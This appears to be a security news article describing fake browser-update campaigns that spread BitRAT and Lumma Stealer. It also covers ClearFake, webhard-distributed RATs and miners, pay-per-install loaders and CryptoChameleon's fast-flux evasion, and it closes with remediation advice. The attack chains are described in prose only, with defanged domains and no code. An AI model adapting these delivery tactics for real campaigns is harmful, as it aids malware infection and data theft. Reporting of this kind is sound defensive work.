Counterfeit web browser updates have emerged as a significant avenue for disseminating remote access trojans (RATs) and information-stealing malware. eSentire, a cybersecurity firm, has recently underscored the prevalent utilization of fraudulent browser updates in the distribution of notorious malware such as BitRAT and Lumma Stealer. This tactic capitalizes on users’ trust in legitimate software updates, deceiving them into unwittingly installing malicious payloads disguised as essential browser updates. The exploitation of this deceptive strategy underscores the sophistication of modern cyber threats and the need for heightened awareness among users to thwart such attacks. As cybercriminals continue to refine their tactics, organizations and individuals must remain vigilant and adopt robust security measures to safeguard against these evolving threats.

Attack Chain Overview

Initial Infection Vector

The attack sequence commences when a potential victim accesses a compromised website containing embedded JavaScript code. This code redirects the user to a deceptive browser update page hosted on “chatgpt-app[.]cloud.” This fraudulent page is designed to mimic legitimate browser update prompts, tricking users into believing they need to update their browser software. However, the update page is malicious and aims to lure unsuspecting users into downloading and installing malware disguised as an update. This initial redirection marks the beginning of a sophisticated attack chain orchestrated by cybercriminals to compromise the security of users’ devices and steal sensitive information. As such, it highlights the importance of exercising caution while browsing the internet and remaining vigilant against deceptive tactics employed by malicious actors.

Delivery Mechanism

Upon redirection, the page initiates an automatic download of a ZIP archive titled “Update.zip,” hosted on Discord. Enclosed within this archive is a JavaScript file named “Update.js,” which triggers the execution of PowerShell scripts. These scripts are responsible for retrieving further malicious payloads, such as BitRAT and Lumma Stealer, from a remote server. Notably, these payloads are disguised as PNG image files, concealing their true nature and evading detection. This sophisticated method of delivery underscores the evolving tactics employed by cybercriminals to infiltrate systems and compromise user data. Organizations and individuals must remain vigilant against such threats and implement robust security measures to mitigate the risk of infection.

Execution and Persistence

The PowerShell scripts not only create persistence on the victim’s device but also introduce a .NET-based loader. This loader is presumed to be advertised as a “malware delivery service” because of its role in distributing both BitRAT and Lumma Stealer. By facilitating the deployment of these malware variants, the loader streamlines the process for attackers and enhances their ability to compromise systems. Its utilization underscores a concerning trend where cybercriminals leverage specialized tools to efficiently distribute a range of malicious payloads. This approach not only increases the likelihood of successful infections but also poses significant challenges for defenders in detecting and mitigating such threats. As a result, organizations must remain vigilant and employ comprehensive security measures to safeguard against these sophisticated attack techniques.

Payload Analysis

BitRAT

BitRAT is a versatile RAT that offers a range of capabilities, including:

• Harvesting data
• Mining cryptocurrency
• Downloading additional binaries
• Remotely controlling infected hosts

Lumma Stealer

Lumma Stealer, a commodity malware introduced in August 2022, is purchasable on the underground market for prices ranging from $250 to $1,000 per month. This malware specializes in harvesting sensitive information from various sources, including web browsers, cryptocurrency wallets, and other repositories of valuable data. With its relatively low cost and high potential for illicit gain, Lumma Stealer has become a popular choice among cybercriminals seeking to profit from stolen credentials and personal information. Its widespread availability underscores the significant threat it poses to individuals and organizations alike, highlighting the need for robust cybersecurity measures to defend against such threats.

Techniques for Distribution

Drive-by Downloads and Malvertising

Attackers frequently employ drive-by downloads and malvertising to attract victims. These methods exploit the trust users have in well-known names and services, thereby increasing the reach and effectiveness of their attacks. By embedding malicious code in seemingly legitimate advertisements or websites, attackers can stealthily deliver malware to unsuspecting users. This approach ensures a broad dissemination of their payloads, making it a potent strategy for widespread malware distribution and infection.

ClearFake Campaign

A new variant of the ClearFake campaign deceives users into manually executing malicious PowerShell code. The malicious website convinces users to install a root certificate to resolve a display issue, instructing them to copy and paste obfuscated PowerShell code. Once executed, this code downloads and installs LummaC2 malware. This tactic effectively exploits user trust and manual intervention to bypass traditional security measures, facilitating the installation of the malware and enabling attackers to infiltrate systems and exfiltrate sensitive data.

Rise of Information Stealers

Prevalence of Lumma Stealer

Lumma Stealer has become a prominent information stealer, joining the ranks of RedLine and Raccoon. Its popularity soared in 2023, evidenced by a 110% rise in LummaC2-obtained logs for sale between Q3 and Q4 2023. This sharp increase highlights its effectiveness in penetrating systems and exfiltrating data without detection. The malware’s success is largely due to its stealthy operation and the high value of the stolen data it harvests. As a result, Lumma Stealer has gained a strong foothold in the cybercriminal ecosystem, becoming a preferred tool for data theft.

Use of Webhards for Malware Distribution

The AhnLab Security Intelligence Center (ASEC) has uncovered a new campaign that leverages webhards to disseminate malicious installers for adult games and pirated software. These installers ultimately deploy a range of malware, including Orcus RAT, XMRig miner, 3proxy, and XWorm. By exploiting the appeal of adult content and pirated software, the attackers can attract numerous users, increasing the likelihood of infection. This method allows the cybercriminals to distribute various types of malware efficiently, targeting victims who seek unauthorized content. The use of webhards, which are online storage services, adds a layer of complexity to the distribution process, making it harder to detect and mitigate these threats.

Additional Findings

PrivateLoader and TaskLoader

Websites that offer pirated software have been pinpointed as key sources for malware loaders such as PrivateLoader and TaskLoader. These loaders function on a pay-per-install (PPI) basis, allowing cybercriminals to pay for the distribution of their own malicious payloads. By leveraging the popularity of pirated software, these loaders can reach a broad audience, facilitating the spread of various types of malware. This PPI model is particularly attractive to cybercriminals because it streamlines the process of malware distribution, providing a scalable and efficient means to infect a large number of devices. Consequently, these pirated software websites serve as a lucrative platform for disseminating malware, contributing significantly to the proliferation of cyber threats.

CryptoChameleon’s Evasion Techniques

Silent Push has revealed that CryptoChameleon utilizes DNSPod[.]com nameservers to bolster its phishing infrastructure. CryptoChameleon employs fast flux evasion techniques, allowing it to rapidly switch between numerous IP addresses associated with a single domain. This method significantly complicates efforts to track and block malicious activity, as the frequent IP changes enable the infrastructure to evade traditional security measures. By constantly cycling through IPs, CryptoChameleon can effectively minimize the operational value of legacy indicators of compromise (IOCs), making it challenging for security tools that rely on static IP blacklists to identify and mitigate threats. This technique enhances the resilience of CryptoChameleon’s phishing campaigns, making them more difficult to disrupt and increasing their chances of success.

Remediation Steps:

1. Update Software Regularly: Ensure all software, including browsers and operating systems, are up-to-date with the latest security patches.
2. Enable Anti-Malware Protection: Use reputable anti-malware software to detect and block malicious downloads and activities.
3. Educate Users: Train users to recognize and avoid phishing attempts and fake update prompts.
4. Disable Automatic Downloads: Configure browsers to prevent automatic downloading of files from untrusted sources.
5. Implement Network Security Measures: Use firewalls and intrusion detection systems to monitor and control network traffic.
6. Regular Backups: Perform regular backups of important data to quickly recover in case of an infection.
7. Restrict PowerShell Execution: Limit the use of PowerShell scripts to trusted administrators to prevent malicious script execution.